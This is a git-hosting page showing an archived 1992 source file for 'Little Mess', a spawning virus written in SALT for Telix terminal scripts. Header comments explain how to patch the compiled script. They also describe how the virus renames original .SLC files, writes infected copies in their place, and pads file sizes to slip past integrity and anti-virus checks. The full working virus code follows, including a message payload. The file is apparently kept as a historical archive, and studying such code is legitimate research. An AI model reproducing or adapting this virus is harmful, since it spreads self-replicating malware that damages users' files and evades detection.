informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/virus/ltlmess.slt

92 lines
3.9 KiB
Plaintext
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Little Mess spawning virus source (c) 92 Crom-Cruach/Trident
// Source in SALT
//
// The compiled script needs some little changes:
// *First, both 1234h's in the SLC must be replaced by (FileLen-011h)
// *the 1st 11h bytes of the script must be copied over the 'REPLACE ME!';
// *Both 1D 06 00's sequences MUST be replaced by 1D 02 00...
// This is of course only educational, and even if it wasn't, it still wouldn't
// spread due to the script exchange rate.
//
// Bad minds, however, might think it's fun having their local network-sysop
// screaming about his system being infected while all anti-viral/integrity
// programs miss it (or, him being dissed for saying he's got a
// script-virus)... Of course, those people are wrong and/or sick.
// Symptoms - 1 out of 8 times it displays a message for 1 sec after
// script execution if all scripts infected.
// Greetz - NuKE / Phalcon/SKISM / YAM & All other practicing researchers...
// Technical info ---
//
// First, the uninfected file is renamed to *.SLX.
// Then, the SLC file is created and the copy of the header is written to it.
// After that, the whole virus is written as a string to the file (SALT-string
// identification code is 19h; offsets in SLC are calculated relative to the
// end of the header (= on +0Ch) - The 06 -> 02 patch changes the offset of the
// buffer to write from Title (+6) to [EndHeader+1] (+2)... The 1234-patch is
// needed to fill in the size of that string). After that, some random bytes
// are written to make the files less suspicious (the amount must be even; at
// least, CS (the TELIX script compiler) never creates files with odd lengths)
// I wanted to mark the SLX files as hidden; but in SALT you can only -read-
// the attribute of a file. Solution could be to write a little routine in ASM
// to a temporary file & to RUN that file; I decided not to, because the flash
// from the shell-to-dos is much more obvious than some 'SLX'-files.
// A system can be infected by starting this script from Telix. It will
// infect one script at a time.
int EndHeader = 0x123419; // Needed for code-copy
str Title[40] = "[Little Mess (c) 92 Crom-Cruach/Trident]";
str Org_Ext[4] = ".SLX";
str Path[64],Trash[64];
str Buf[12] = ""; // No script to start after 'mother'.
str Spawned_On[12];
// Header
str Header[17]="REPLACE ME!"; // must be replaced by header (debug)
int Handle;
main()
{
Spawned_On = Buf;
path = _script_dir;
strcat(path,"*.SLC"); // Search script (not 8 chars-FName!)
FNext:
if (not FileFind(path,0,Buf)) // File found?
{ EndHeader=0; } // No more; mark 'all infected'
else
{
path = ""; // Prepare for find-next
trash = _script_dir;
strcat(trash,Buf); // Trash = path+filename+ext
FNStrip(Trash,7,Buf); // Buf = filename only
strcat(Buf,Org_Ext); // Give new extension
if (frename(Trash,Buf) != 0) goto FNext;
// File not renamed (already spawned)
Handle = FOpen(Trash,"w"); // Make new file, same name
If (Handle == 0) // Error opening; restore orig. fname
{
Path = _script_dir;
strcat(path,Buf); // path = path+new_fname
frename(Path,Trash); // rename-back
goto Quit_Infect;
}
FWrite(Header,17,Handle); // Write header
FWrite(Title,0x1234,Handle); // Title REPLACED by (ofs EndH.+1)
FWrite(Title,(CurTime()&254),Handle); // Make size random (must be even)
FClose(Handle);
}
Quit_Infect:
call(Spawned_On); // Start orig. script
if ((EndHeader==0) and // If all infected
((CurTime()&7)==7)) // Show message 1 out of 8 times
Status_Wind("Legalize Marijuana! - <20>ڳ<10><><EFBFBD>",10);
}
Reference in New Issue View Git Blame Copy Permalink